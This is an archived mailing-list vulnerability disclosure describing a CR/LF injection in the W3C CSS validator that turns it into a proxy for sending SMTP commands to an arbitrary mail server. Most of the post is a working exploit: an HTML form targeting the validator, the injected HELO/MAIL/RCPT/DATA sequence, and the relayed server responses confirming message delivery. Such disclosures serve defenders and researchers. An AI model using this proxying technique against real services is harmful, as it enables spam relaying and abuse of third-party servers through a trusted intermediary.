[<prev] [next>] [day] [month] [year] [list]
Message-ID: <002f01c25c31$ab3ab720$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: W3C CSS Validator -- Proxying Attack
Another vulnerability at the W3C, this time the CSS validator. A Cr/Lf
injection can be performed by creating a custom form:
<FORM METHOD="GET" ACTION="http://jigsaw.w3.org/css-validator/validator">
<INPUT TYPE="hidden" NAME="warning" VALUE="1">
<INPUT TYPE="hidden" NAME="profile" VALUE="css2">
Commands:
<TEXTAREA STYLE="width:300px;height:300px" NAME="uri"
ONDBLCLICK="document.forms(0).submit()"></TEXTAREA>
</FORM>
And filling it in with something like:
[Begin Form]
http://mailserver:25/
HELO 127.0.0.1
MAIL FROM:me@...e.com
RCPT TO:you@...ewhere.com
DATA
This is a simple message demonstrating the W3 relaying hole
.
QUIT
[End Form]
This results in:
GET /
502 Unknown Command
HELO 127.0.0.1
250 Welcome [138.96.249.65], pleased to meet you
MAIL FROM:me@...e.com
250 Sender "me@...e.com" OK...
RCPT TO:you@...ewhere.com
250 Recipient "you@...ewhere.com" OK...
DATA
354 Enter mail, end with "." on a line by itself
This is a simple message demonstrating the W3 relaying hole
.
250 Message accepted for delivery.
QUIT
221 Closing Session
If you relay this properly, the CSS validator will whine about the
connection being terminated by the peer (this is done immediately after the
SMTP command "QUIT" being sent. There is a 502 error in the logs from "GET
/", but that is really un-avoidable.
"The reason the mainstream is thought
of as a stream is because it is
so shallow."
- Author Unknown
Powered by blists - more mailing lists